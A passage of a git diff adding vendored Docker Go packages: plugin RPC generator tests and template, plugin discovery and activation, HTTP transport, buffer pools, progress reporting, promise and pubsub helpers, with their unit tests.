assertName(t, "Wiggle", f.Name) + assertNum(t, 0, len(f.Args)) + assertNum(t, 1, len(f.Returns)) + arg = f.Returns[0] + assertName(t, "w", arg.Name) + assertName(t, "wobble", arg.ArgType) + + f = pkg.Functions[6] + assertName(t, "WiggleWobble", f.Name) + assertNum(t, 6, len(f.Args)) + assertNum(t, 6, len(f.Returns)) + expectedArgs := [][]string{ + {"a", "[]*wobble"}, + {"b", "[]wobble"}, + {"c", "map[string]*wobble"}, + {"d", "map[*wobble]wobble"}, + {"e", "map[string][]wobble"}, + {"f", 
"[]*otherfixture.Spaceship"}, + } + for i, arg := range f.Args { + assertName(t, expectedArgs[i][0], arg.Name) + assertName(t, expectedArgs[i][1], arg.ArgType) + } + expectedReturns := [][]string{ + {"g", "map[*wobble]wobble"}, + {"h", "[][]*wobble"}, + {"i", "otherfixture.Spaceship"}, + {"j", "*otherfixture.Spaceship"}, + {"k", "map[*otherfixture.Spaceship]otherfixture.Spaceship"}, + {"l", "[]otherfixture.Spaceship"}, + } + for i, ret := range f.Returns { + assertName(t, expectedReturns[i][0], ret.Name) + assertName(t, expectedReturns[i][1], ret.ArgType) + } +} + +func TestParseWithUnamedReturn(t *testing.T) { + _, err := Parse(testFixture, "Fooer4") + if !strings.HasSuffix(err.Error(), errBadReturn.Error()) { + t.Fatalf("expected ErrBadReturn, got %v", err) + } +} + +func TestEmbeddedInterface(t *testing.T) { + pkg, err := Parse(testFixture, "Fooer5") + if err != nil { + t.Fatal(err) + } + + assertName(t, "foo", pkg.Name) + assertNum(t, 2, len(pkg.Functions)) + + f := pkg.Functions[0] + assertName(t, "Foo", f.Name) + assertNum(t, 0, len(f.Args)) + assertNum(t, 0, len(f.Returns)) + + f = pkg.Functions[1] + assertName(t, "Boo", f.Name) + assertNum(t, 2, len(f.Args)) + assertNum(t, 2, len(f.Returns)) + + arg := f.Args[0] + assertName(t, "a", arg.Name) + assertName(t, "string", arg.ArgType) + + arg = f.Args[1] + assertName(t, "b", arg.Name) + assertName(t, "string", arg.ArgType) + + arg = f.Returns[0] + assertName(t, "s", arg.Name) + assertName(t, "string", arg.ArgType) + + arg = f.Returns[1] + assertName(t, "err", arg.Name) + assertName(t, "error", arg.ArgType) +} + +func TestParsedImports(t *testing.T) { + cases := []string{"Fooer6", "Fooer7", "Fooer8", "Fooer9", "Fooer10", "Fooer11"} + for _, testCase := range cases { + pkg, err := Parse(testFixture, testCase) + if err != nil { + t.Fatal(err) + } + + assertNum(t, 1, len(pkg.Imports)) + importPath := strings.Split(pkg.Imports[0].Path, "/") + assertName(t, "otherfixture\"", importPath[len(importPath)-1]) + 
assertName(t, "", pkg.Imports[0].Name) + } +} + +func TestAliasedImports(t *testing.T) { + pkg, err := Parse(testFixture, "Fooer12") + if err != nil { + t.Fatal(err) + } + + assertNum(t, 1, len(pkg.Imports)) + assertName(t, "aliasedio", pkg.Imports[0].Name) +} + +func assertName(t *testing.T, expected, actual string) { + if expected != actual { + fatalOut(t, fmt.Sprintf("expected name to be `%s`, got: %s", expected, actual)) + } +} + +func assertNum(t *testing.T, expected, actual int) { + if expected != actual { + fatalOut(t, fmt.Sprintf("expected number to be %d, got: %d", expected, actual)) + } +} + +func fatalOut(t *testing.T, msg string) { + _, file, ln, _ := runtime.Caller(2) + t.Fatalf("%s:%d: %s", filepath.Base(file), ln, msg) +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/template.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/template.go new file mode 100644 index 0000000000..50ed9293c1 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/template.go @@ -0,0 +1,118 @@ +package main + +import ( + "strings" + "text/template" +) + +func printArgs(args []arg) string { + var argStr []string + for _, arg := range args { + argStr = append(argStr, arg.String()) + } + return strings.Join(argStr, ", ") +} + +func buildImports(specs []importSpec) string { + if len(specs) == 0 { + return `import "errors"` + } + imports := "import(\n" + imports += "\t\"errors\"\n" + for _, i := range specs { + imports += "\t" + i.String() + "\n" + } + imports += ")" + return imports +} + +func marshalType(t string) string { + switch t { + case "error": + // convert error types to plain strings to ensure the values are encoded/decoded properly + return "string" + default: + return t + } +} + +func isErr(t string) bool { + switch t { + case "error": + return true + default: + return false + } +} + +// Need to use this helper due to issues with go-vet +func buildTag(s string) string { + return "+build " + s +} + +var 
templFuncs = template.FuncMap{ + "printArgs": printArgs, + "marshalType": marshalType, + "isErr": isErr, + "lower": strings.ToLower, + "title": title, + "tag": buildTag, + "imports": buildImports, +} + +func title(s string) string { + if strings.ToLower(s) == "id" { + return "ID" + } + return strings.Title(s) +} + +var generatedTempl = template.Must(template.New("rpc_cient").Funcs(templFuncs).Parse(` +// generated code - DO NOT EDIT +{{ range $k, $v := .BuildTags }} + // {{ tag $k }} {{ end }} + +package {{ .Name }} + +{{ imports .Imports }} + +type client interface{ + Call(string, interface{}, interface{}) error +} + +type {{ .InterfaceType }}Proxy struct { + client +} + +{{ range .Functions }} + type {{ $.InterfaceType }}Proxy{{ .Name }}Request struct{ + {{ range .Args }} + {{ title .Name }} {{ .ArgType }} {{ end }} + } + + type {{ $.InterfaceType }}Proxy{{ .Name }}Response struct{ + {{ range .Returns }} + {{ title .Name }} {{ marshalType .ArgType }} {{ end }} + } + + func (pp *{{ $.InterfaceType }}Proxy) {{ .Name }}({{ printArgs .Args }}) ({{ printArgs .Returns }}) { + var( + req {{ $.InterfaceType }}Proxy{{ .Name }}Request + ret {{ $.InterfaceType }}Proxy{{ .Name }}Response + ) + {{ range .Args }} + req.{{ title .Name }} = {{ lower .Name }} {{ end }} + if err = pp.Call("{{ $.RPCName }}.{{ .Name }}", req, &ret); err != nil { + return + } + {{ range $r := .Returns }} + {{ if isErr .ArgType }} + if ret.{{ title .Name }} != "" { + {{ lower .Name }} = errors.New(ret.{{ title .Name }}) + } {{ end }} + {{ if isErr .ArgType | not }} {{ lower .Name }} = ret.{{ title .Name }} {{ end }} {{ end }} + + return + } +{{ end }} +`)) diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins.go b/vendor/github.com/docker/docker/pkg/plugins/plugins.go new file mode 100644 index 0000000000..c0059cba75 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/plugins.go @@ -0,0 +1,329 @@ +// Package plugins provides structures and helper functions to manage Docker +// 
plugins. +// +// Docker discovers plugins by looking for them in the plugin directory whenever +// a user or container tries to use one by name. UNIX domain socket files must +// be located under /run/docker/plugins, whereas spec files can be located +// either under /etc/docker/plugins or /usr/lib/docker/plugins. This is handled +// by the Registry interface, which lets you list all plugins or get a plugin by +// its name if it exists. +// +// The plugins need to implement an HTTP server and bind this to the UNIX socket +// or the address specified in the spec files. +// A handshake is send at /Plugin.Activate, and plugins are expected to return +// a Manifest with a list of of Docker subsystems which this plugin implements. +// +// In order to use a plugins, you can use the ``Get`` with the name of the +// plugin and the subsystem it implements. +// +// plugin, err := plugins.Get("example", "VolumeDriver") +// if err != nil { +// return fmt.Errorf("Error looking up volume plugin example: %v", err) +// } +package plugins + +import ( + "errors" + "sync" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/go-connections/tlsconfig" +) + +var ( + // ErrNotImplements is returned if the plugin does not implement the requested driver. + ErrNotImplements = errors.New("Plugin does not implement the requested driver") +) + +type plugins struct { + sync.Mutex + plugins map[string]*Plugin +} + +type extpointHandlers struct { + sync.RWMutex + extpointHandlers map[string][]func(string, *Client) +} + +var ( + storage = plugins{plugins: make(map[string]*Plugin)} + handlers = extpointHandlers{extpointHandlers: make(map[string][]func(string, *Client))} +) + +// Manifest lists what a plugin implements. +type Manifest struct { + // List of subsystem the plugin implements. + Implements []string +} + +// Plugin is the definition of a docker plugin. 
+type Plugin struct { + // Name of the plugin + name string + // Address of the plugin + Addr string + // TLS configuration of the plugin + TLSConfig *tlsconfig.Options + // Client attached to the plugin + client *Client + // Manifest of the plugin (see above) + Manifest *Manifest `json:"-"` + + // wait for activation to finish + activateWait *sync.Cond + // error produced by activation + activateErr error + // keeps track of callback handlers run against this plugin + handlersRun bool +} + +// Name returns the name of the plugin. +func (p *Plugin) Name() string { + return p.name +} + +// Client returns a ready-to-use plugin client that can be used to communicate with the plugin. +func (p *Plugin) Client() *Client { + return p.client +} + +// IsV1 returns true for V1 plugins and false otherwise. +func (p *Plugin) IsV1() bool { + return true +} + +// NewLocalPlugin creates a new local plugin. +func NewLocalPlugin(name, addr string) *Plugin { + return &Plugin{ + name: name, + Addr: addr, + // TODO: change to nil + TLSConfig: &tlsconfig.Options{InsecureSkipVerify: true}, + activateWait: sync.NewCond(&sync.Mutex{}), + } +} + +func (p *Plugin) activate() error { + p.activateWait.L.Lock() + + if p.activated() { + p.runHandlers() + p.activateWait.L.Unlock() + return p.activateErr + } + + p.activateErr = p.activateWithLock() + + p.runHandlers() + p.activateWait.L.Unlock() + p.activateWait.Broadcast() + return p.activateErr +} + +// runHandlers runs the registered handlers for the implemented plugin types +// This should only be run after activation, and while the activation lock is held. 
+func (p *Plugin) runHandlers() { + if !p.activated() { + return + } + + handlers.RLock() + if !p.handlersRun { + for _, iface := range p.Manifest.Implements { + hdlrs, handled := handlers.extpointHandlers[iface] + if !handled { + continue + } + for _, handler := range hdlrs { + handler(p.name, p.client) + } + } + p.handlersRun = true + } + handlers.RUnlock() + +} + +// activated returns if the plugin has already been activated. +// This should only be called with the activation lock held +func (p *Plugin) activated() bool { + return p.Manifest != nil +} + +func (p *Plugin) activateWithLock() error { + c, err := NewClient(p.Addr, p.TLSConfig) + if err != nil { + return err + } + p.client = c + + m := new(Manifest) + if err = p.client.Call("Plugin.Activate", nil, m); err != nil { + return err + } + + p.Manifest = m + return nil +} + +func (p *Plugin) waitActive() error { + p.activateWait.L.Lock() + for !p.activated() && p.activateErr == nil { + p.activateWait.Wait() + } + p.activateWait.L.Unlock() + return p.activateErr +} + +func (p *Plugin) implements(kind string) bool { + if p.Manifest == nil { + return false + } + for _, driver := range p.Manifest.Implements { + if driver == kind { + return true + } + } + return false +} + +func load(name string) (*Plugin, error) { + return loadWithRetry(name, true) +} + +func loadWithRetry(name string, retry bool) (*Plugin, error) { + registry := newLocalRegistry() + start := time.Now() + + var retries int + for { + pl, err := registry.Plugin(name) + if err != nil { + if !retry { + return nil, err + } + + timeOff := backoff(retries) + if abort(start, timeOff) { + return nil, err + } + retries++ + logrus.Warnf("Unable to locate plugin: %s, retrying in %v", name, timeOff) + time.Sleep(timeOff) + continue + } + + storage.Lock() + if pl, exists := storage.plugins[name]; exists { + storage.Unlock() + return pl, pl.activate() + } + storage.plugins[name] = pl + storage.Unlock() + + err = pl.activate() + + if err != nil { + 
storage.Lock() + delete(storage.plugins, name) + storage.Unlock() + } + + return pl, err + } +} + +func get(name string) (*Plugin, error) { + storage.Lock() + pl, ok := storage.plugins[name] + storage.Unlock() + if ok { + return pl, pl.activate() + } + return load(name) +} + +// Get returns the plugin given the specified name and requested implementation. +func Get(name, imp string) (*Plugin, error) { + pl, err := get(name) + if err != nil { + return nil, err + } + if err := pl.waitActive(); err == nil && pl.implements(imp) { + logrus.Debugf("%s implements: %s", name, imp) + return pl, nil + } + return nil, ErrNotImplements +} + +// Handle adds the specified function to the extpointHandlers. +func Handle(iface string, fn func(string, *Client)) { + handlers.Lock() + hdlrs, ok := handlers.extpointHandlers[iface] + if !ok { + hdlrs = []func(string, *Client){} + } + + hdlrs = append(hdlrs, fn) + handlers.extpointHandlers[iface] = hdlrs + + storage.Lock() + for _, p := range storage.plugins { + p.activateWait.L.Lock() + if p.activated() && p.implements(iface) { + p.handlersRun = false + } + p.activateWait.L.Unlock() + } + storage.Unlock() + + handlers.Unlock() +} + +// GetAll returns all the plugins for the specified implementation +func GetAll(imp string) ([]*Plugin, error) { + pluginNames, err := Scan() + if err != nil { + return nil, err + } + + type plLoad struct { + pl *Plugin + err error + } + + chPl := make(chan *plLoad, len(pluginNames)) + var wg sync.WaitGroup + for _, name := range pluginNames { + storage.Lock() + pl, ok := storage.plugins[name] + storage.Unlock() + if ok { + chPl <- &plLoad{pl, nil} + continue + } + + wg.Add(1) + go func(name string) { + defer wg.Done() + pl, err := loadWithRetry(name, false) + chPl <- &plLoad{pl, err} + }(name) + } + + wg.Wait() + close(chPl) + + var out []*Plugin + for pl := range chPl { + if pl.err != nil { + logrus.Error(pl.err) + continue + } + if err := pl.pl.waitActive(); err == nil && pl.pl.implements(imp) { + out = 
append(out, pl.pl) + } + } + return out, nil +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go b/vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go new file mode 100644 index 0000000000..9c5a0b5632 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go @@ -0,0 +1,7 @@ +package plugins + +// BasePath returns the path to which all paths returned by the plugin are relative to. +// For v1 plugins, this always returns the host's root directory. +func (p *Plugin) BasePath() string { + return "/" +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go b/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go new file mode 100644 index 0000000000..3c8d8feb83 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go @@ -0,0 +1,8 @@ +package plugins + +// BasePath returns the path to which all paths returned by the plugin are relative to. +// For Windows v1 plugins, this returns an empty string, since the plugin is already aware +// of the absolute path of the mount. +func (p *Plugin) BasePath() string { + return "" +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/transport/http.go b/vendor/github.com/docker/docker/pkg/plugins/transport/http.go new file mode 100644 index 0000000000..5be146af65 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/transport/http.go @@ -0,0 +1,36 @@ +package transport + +import ( + "io" + "net/http" +) + +// httpTransport holds an http.RoundTripper +// and information about the scheme and address the transport +// sends request to. +type httpTransport struct { + http.RoundTripper + scheme string + addr string +} + +// NewHTTPTransport creates a new httpTransport. 
+func NewHTTPTransport(r http.RoundTripper, scheme, addr string) Transport { + return httpTransport{ + RoundTripper: r, + scheme: scheme, + addr: addr, + } +} + +// NewRequest creates a new http.Request and sets the URL +// scheme and address with the transport's fields. +func (t httpTransport) NewRequest(path string, data io.Reader) (*http.Request, error) { + req, err := newHTTPRequest(path, data) + if err != nil { + return nil, err + } + req.URL.Scheme = t.scheme + req.URL.Host = t.addr + return req, nil +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go b/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go new file mode 100644 index 0000000000..d7f1e2100c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go @@ -0,0 +1,36 @@ +package transport + +import ( + "io" + "net/http" + "strings" +) + +// VersionMimetype is the Content-Type the engine sends to plugins. +const VersionMimetype = "application/vnd.docker.plugins.v1.2+json" + +// RequestFactory defines an interface that +// transports can implement to create new requests. +type RequestFactory interface { + NewRequest(path string, data io.Reader) (*http.Request, error) +} + +// Transport defines an interface that plugin transports +// must implement. +type Transport interface { + http.RoundTripper + RequestFactory +} + +// newHTTPRequest creates a new request with a path and a body. 
+func newHTTPRequest(path string, data io.Reader) (*http.Request, error) { + if !strings.HasPrefix(path, "/") { + path = "/" + path + } + req, err := http.NewRequest("POST", path, data) + if err != nil { + return nil, err + } + req.Header.Add("Accept", VersionMimetype) + return req, nil +} diff --git a/vendor/github.com/docker/docker/pkg/pools/pools.go b/vendor/github.com/docker/docker/pkg/pools/pools.go new file mode 100644 index 0000000000..5c5aead698 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/pools/pools.go @@ -0,0 +1,116 @@ +// Package pools provides a collection of pools which provide various +// data types with buffers. These can be used to lower the number of +// memory allocations and reuse buffers. +// +// New pools should be added to this package to allow them to be +// shared across packages. +// +// Utility functions which operate on pools should be added to this +// package to allow them to be reused. +package pools + +import ( + "bufio" + "io" + "sync" + + "github.com/docker/docker/pkg/ioutils" +) + +var ( + // BufioReader32KPool is a pool which returns bufio.Reader with a 32K buffer. + BufioReader32KPool = newBufioReaderPoolWithSize(buffer32K) + // BufioWriter32KPool is a pool which returns bufio.Writer with a 32K buffer. + BufioWriter32KPool = newBufioWriterPoolWithSize(buffer32K) +) + +const buffer32K = 32 * 1024 + +// BufioReaderPool is a bufio reader that uses sync.Pool. +type BufioReaderPool struct { + pool sync.Pool +} + +// newBufioReaderPoolWithSize is unexported because new pools should be +// added here to be shared where required. +func newBufioReaderPoolWithSize(size int) *BufioReaderPool { + return &BufioReaderPool{ + pool: sync.Pool{ + New: func() interface{} { return bufio.NewReaderSize(nil, size) }, + }, + } +} + +// Get returns a bufio.Reader which reads from r. The buffer size is that of the pool. 
+func (bufPool *BufioReaderPool) Get(r io.Reader) *bufio.Reader { + buf := bufPool.pool.Get().(*bufio.Reader) + buf.Reset(r) + return buf +} + +// Put puts the bufio.Reader back into the pool. +func (bufPool *BufioReaderPool) Put(b *bufio.Reader) { + b.Reset(nil) + bufPool.pool.Put(b) +} + +// Copy is a convenience wrapper which uses a buffer to avoid allocation in io.Copy. +func Copy(dst io.Writer, src io.Reader) (written int64, err error) { + buf := BufioReader32KPool.Get(src) + written, err = io.Copy(dst, buf) + BufioReader32KPool.Put(buf) + return +} + +// NewReadCloserWrapper returns a wrapper which puts the bufio.Reader back +// into the pool and closes the reader if it's an io.ReadCloser. +func (bufPool *BufioReaderPool) NewReadCloserWrapper(buf *bufio.Reader, r io.Reader) io.ReadCloser { + return ioutils.NewReadCloserWrapper(r, func() error { + if readCloser, ok := r.(io.ReadCloser); ok { + readCloser.Close() + } + bufPool.Put(buf) + return nil + }) +} + +// BufioWriterPool is a bufio writer that uses sync.Pool. +type BufioWriterPool struct { + pool sync.Pool +} + +// newBufioWriterPoolWithSize is unexported because new pools should be +// added here to be shared where required. +func newBufioWriterPoolWithSize(size int) *BufioWriterPool { + return &BufioWriterPool{ + pool: sync.Pool{ + New: func() interface{} { return bufio.NewWriterSize(nil, size) }, + }, + } +} + +// Get returns a bufio.Writer which writes to w. The buffer size is that of the pool. +func (bufPool *BufioWriterPool) Get(w io.Writer) *bufio.Writer { + buf := bufPool.pool.Get().(*bufio.Writer) + buf.Reset(w) + return buf +} + +// Put puts the bufio.Writer back into the pool. +func (bufPool *BufioWriterPool) Put(b *bufio.Writer) { + b.Reset(nil) + bufPool.pool.Put(b) +} + +// NewWriteCloserWrapper returns a wrapper which puts the bufio.Writer back +// into the pool and closes the writer if it's an io.Writecloser. 
+func (bufPool *BufioWriterPool) NewWriteCloserWrapper(buf *bufio.Writer, w io.Writer) io.WriteCloser { + return ioutils.NewWriteCloserWrapper(w, func() error { + buf.Flush() + if writeCloser, ok := w.(io.WriteCloser); ok { + writeCloser.Close() + } + bufPool.Put(buf) + return nil + }) +} diff --git a/vendor/github.com/docker/docker/pkg/pools/pools_test.go b/vendor/github.com/docker/docker/pkg/pools/pools_test.go new file mode 100644 index 0000000000..1661b780c9 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/pools/pools_test.go @@ -0,0 +1,161 @@ +package pools + +import ( + "bufio" + "bytes" + "io" + "strings" + "testing" +) + +func TestBufioReaderPoolGetWithNoReaderShouldCreateOne(t *testing.T) { + reader := BufioReader32KPool.Get(nil) + if reader == nil { + t.Fatalf("BufioReaderPool should have create a bufio.Reader but did not.") + } +} + +func TestBufioReaderPoolPutAndGet(t *testing.T) { + sr := bufio.NewReader(strings.NewReader("foobar")) + reader := BufioReader32KPool.Get(sr) + if reader == nil { + t.Fatalf("BufioReaderPool should not return a nil reader.") + } + // verify the first 3 byte + buf1 := make([]byte, 3) + _, err := reader.Read(buf1) + if err != nil { + t.Fatal(err) + } + if actual := string(buf1); actual != "foo" { + t.Fatalf("The first letter should have been 'foo' but was %v", actual) + } + BufioReader32KPool.Put(reader) + // Try to read the next 3 bytes + _, err = sr.Read(make([]byte, 3)) + if err == nil || err != io.EOF { + t.Fatalf("The buffer should have been empty, issue an EOF error.") + } +} + +type simpleReaderCloser struct { + io.Reader + closed bool +} + +func (r *simpleReaderCloser) Close() error { + r.closed = true + return nil +} + +func TestNewReadCloserWrapperWithAReadCloser(t *testing.T) { + br := bufio.NewReader(strings.NewReader("")) + sr := &simpleReaderCloser{ + Reader: strings.NewReader("foobar"), + closed: false, + } + reader := BufioReader32KPool.NewReadCloserWrapper(br, sr) + if reader == nil { + 
t.Fatalf("NewReadCloserWrapper should not return a nil reader.") + } + // Verify the content of reader + buf := make([]byte, 3) + _, err := reader.Read(buf) + if err != nil { + t.Fatal(err) + } + if actual := string(buf); actual != "foo" { + t.Fatalf("The first 3 letter should have been 'foo' but were %v", actual) + } + reader.Close() + // Read 3 more bytes "bar" + _, err = reader.Read(buf) + if err != nil { + t.Fatal(err) + } + if actual := string(buf); actual != "bar" { + t.Fatalf("The first 3 letter should have been 'bar' but were %v", actual) + } + if !sr.closed { + t.Fatalf("The ReaderCloser should have been closed, it is not.") + } +} + +func TestBufioWriterPoolGetWithNoReaderShouldCreateOne(t *testing.T) { + writer := BufioWriter32KPool.Get(nil) + if writer == nil { + t.Fatalf("BufioWriterPool should have create a bufio.Writer but did not.") + } +} + +func TestBufioWriterPoolPutAndGet(t *testing.T) { + buf := new(bytes.Buffer) + bw := bufio.NewWriter(buf) + writer := BufioWriter32KPool.Get(bw) + if writer == nil { + t.Fatalf("BufioReaderPool should not return a nil writer.") + } + written, err := writer.Write([]byte("foobar")) + if err != nil { + t.Fatal(err) + } + if written != 6 { + t.Fatalf("Should have written 6 bytes, but wrote %v bytes", written) + } + // Make sure we Flush all the way ? 
+ writer.Flush() + bw.Flush() + if len(buf.Bytes()) != 6 { + t.Fatalf("The buffer should contain 6 bytes ('foobar') but contains %v ('%v')", buf.Bytes(), string(buf.Bytes())) + } + // Reset the buffer + buf.Reset() + BufioWriter32KPool.Put(writer) + // Try to write something + if _, err = writer.Write([]byte("barfoo")); err != nil { + t.Fatal(err) + } + // If we now try to flush it, it should panic (the writer is nil) + // recover it + defer func() { + if r := recover(); r == nil { + t.Fatal("Trying to flush the writter should have 'paniced', did not.") + } + }() + writer.Flush() +} + +type simpleWriterCloser struct { + io.Writer + closed bool +} + +func (r *simpleWriterCloser) Close() error { + r.closed = true + return nil +} + +func TestNewWriteCloserWrapperWithAWriteCloser(t *testing.T) { + buf := new(bytes.Buffer) + bw := bufio.NewWriter(buf) + sw := &simpleWriterCloser{ + Writer: new(bytes.Buffer), + closed: false, + } + bw.Flush() + writer := BufioWriter32KPool.NewWriteCloserWrapper(bw, sw) + if writer == nil { + t.Fatalf("BufioReaderPool should not return a nil writer.") + } + written, err := writer.Write([]byte("foobar")) + if err != nil { + t.Fatal(err) + } + if written != 6 { + t.Fatalf("Should have written 6 bytes, but wrote %v bytes", written) + } + writer.Close() + if !sw.closed { + t.Fatalf("The ReaderCloser should have been closed, it is not.") + } +} diff --git a/vendor/github.com/docker/docker/pkg/progress/progress.go b/vendor/github.com/docker/docker/pkg/progress/progress.go new file mode 100644 index 0000000000..fcf31173cf --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/progress/progress.go @@ -0,0 +1,84 @@ +package progress + +import ( + "fmt" +) + +// Progress represents the progress of a transfer. +type Progress struct { + ID string + + // Progress contains a Message or... 
+ Message string + + // ...progress of an action + Action string + Current int64 + Total int64 + + // Aux contains extra information not presented to the user, such as + // digests for push signing. + Aux interface{} + + LastUpdate bool +} + +// Output is an interface for writing progress information. It's +// like a writer for progress, but we don't call it Writer because +// that would be confusing next to ProgressReader (also, because it +// doesn't implement the io.Writer interface). +type Output interface { + WriteProgress(Progress) error +} + +type chanOutput chan<- Progress + +func (out chanOutput) WriteProgress(p Progress) error { + out <- p + return nil +} + +// ChanOutput returns an Output that writes progress updates to the +// supplied channel. +func ChanOutput(progressChan chan<- Progress) Output { + return chanOutput(progressChan) +} + +type discardOutput struct{} + +func (discardOutput) WriteProgress(Progress) error { + return nil +} + +// DiscardOutput returns an Output that discards progress +func DiscardOutput() Output { + return discardOutput{} +} + +// Update is a convenience function to write a progress update to the channel. +func Update(out Output, id, action string) { + out.WriteProgress(Progress{ID: id, Action: action}) +} + +// Updatef is a convenience function to write a printf-formatted progress update +// to the channel. +func Updatef(out Output, id, format string, a ...interface{}) { + Update(out, id, fmt.Sprintf(format, a...)) +} + +// Message is a convenience function to write a progress message to the channel. +func Message(out Output, id, message string) { + out.WriteProgress(Progress{ID: id, Message: message}) +} + +// Messagef is a convenience function to write a printf-formatted progress +// message to the channel. 
+func Messagef(out Output, id, format string, a ...interface{}) { + Message(out, id, fmt.Sprintf(format, a...)) +} + +// Aux sends auxiliary information over a progress interface, which will not be +// formatted for the UI. This is used for things such as push signing. +func Aux(out Output, a interface{}) { + out.WriteProgress(Progress{Aux: a}) +} diff --git a/vendor/github.com/docker/docker/pkg/progress/progressreader.go b/vendor/github.com/docker/docker/pkg/progress/progressreader.go new file mode 100644 index 0000000000..6b3927eecf --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/progress/progressreader.go @@ -0,0 +1,66 @@ +package progress + +import ( + "io" + "time" + + "golang.org/x/time/rate" +) + +// Reader is a Reader with progress bar. +type Reader struct { + in io.ReadCloser // Stream to read from + out Output // Where to send progress bar to + size int64 + current int64 + lastUpdate int64 + id string + action string + rateLimiter *rate.Limiter +} + +// NewProgressReader creates a new ProgressReader. +func NewProgressReader(in io.ReadCloser, out Output, size int64, id, action string) *Reader { + return &Reader{ + in: in, + out: out, + size: size, + id: id, + action: action, + rateLimiter: rate.NewLimiter(rate.Every(100*time.Millisecond), 1), + } +} + +func (p *Reader) Read(buf []byte) (n int, err error) { + read, err := p.in.Read(buf) + p.current += int64(read) + updateEvery := int64(1024 * 512) //512kB + if p.size > 0 { + // Update progress for every 1% read if 1% < 512kB + if increment := int64(0.01 * float64(p.size)); increment < updateEvery { + updateEvery = increment + } + } + if p.current-p.lastUpdate > updateEvery || err != nil { + p.updateProgress(err != nil && read == 0) + p.lastUpdate = p.current + } + + return read, err +} + +// Close closes the progress reader and its underlying reader. 
+func (p *Reader) Close() error { + if p.current < p.size { + // print a full progress bar when closing prematurely + p.current = p.size + p.updateProgress(false) + } + return p.in.Close() +} + +func (p *Reader) updateProgress(last bool) { + if last || p.current == p.size || p.rateLimiter.Allow() { + p.out.WriteProgress(Progress{ID: p.id, Action: p.action, Current: p.current, Total: p.size, LastUpdate: last}) + } +} diff --git a/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go b/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go new file mode 100644 index 0000000000..b14d401561 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go @@ -0,0 +1,75 @@ +package progress + +import ( + "bytes" + "io" + "io/ioutil" + "testing" +) + +func TestOutputOnPrematureClose(t *testing.T) { + content := []byte("TESTING") + reader := ioutil.NopCloser(bytes.NewReader(content)) + progressChan := make(chan Progress, 10) + + pr := NewProgressReader(reader, ChanOutput(progressChan), int64(len(content)), "Test", "Read") + + part := make([]byte, 4, 4) + _, err := io.ReadFull(pr, part) + if err != nil { + pr.Close() + t.Fatal(err) + } + +drainLoop: + for { + select { + case <-progressChan: + default: + break drainLoop + } + } + + pr.Close() + + select { + case <-progressChan: + default: + t.Fatalf("Expected some output when closing prematurely") + } +} + +func TestCompleteSilently(t *testing.T) { + content := []byte("TESTING") + reader := ioutil.NopCloser(bytes.NewReader(content)) + progressChan := make(chan Progress, 10) + + pr := NewProgressReader(reader, ChanOutput(progressChan), int64(len(content)), "Test", "Read") + + out, err := ioutil.ReadAll(pr) + if err != nil { + pr.Close() + t.Fatal(err) + } + if string(out) != "TESTING" { + pr.Close() + t.Fatalf("Unexpected output %q from reader", string(out)) + } + +drainLoop: + for { + select { + case <-progressChan: + default: + break drainLoop + } + } + + pr.Close() + + 
select { + case <-progressChan: + t.Fatalf("Should have closed silently when read is complete") + default: + } +} diff --git a/vendor/github.com/docker/docker/pkg/promise/promise.go b/vendor/github.com/docker/docker/pkg/promise/promise.go new file mode 100644 index 0000000000..dd52b9082f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/promise/promise.go @@ -0,0 +1,11 @@ +package promise + +// Go is a basic promise implementation: it wraps calls a function in a goroutine, +// and returns a channel which will later return the function's return value. +func Go(f func() error) chan error { + ch := make(chan error, 1) + go func() { + ch <- f() + }() + return ch +} diff --git a/vendor/github.com/docker/docker/pkg/pubsub/publisher.go b/vendor/github.com/docker/docker/pkg/pubsub/publisher.go new file mode 100644 index 0000000000..09364617e4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/pubsub/publisher.go @@ -0,0 +1,111 @@ +package pubsub + +import ( + "sync" + "time" +) + +var wgPool = sync.Pool{New: func() interface{} { return new(sync.WaitGroup) }} + +// NewPublisher creates a new pub/sub publisher to broadcast messages. +// The duration is used as the send timeout as to not block the publisher publishing +// messages to other clients if one client is slow or unresponsive. +// The buffer is used when creating new channels for subscribers. +func NewPublisher(publishTimeout time.Duration, buffer int) *Publisher { + return &Publisher{ + buffer: buffer, + timeout: publishTimeout, + subscribers: make(map[subscriber]topicFunc), + } +} + +type subscriber chan interface{} +type topicFunc func(v interface{}) bool + +// Publisher is basic pub/sub structure. Allows to send events and subscribe +// to them. Can be safely used from multiple goroutines. 
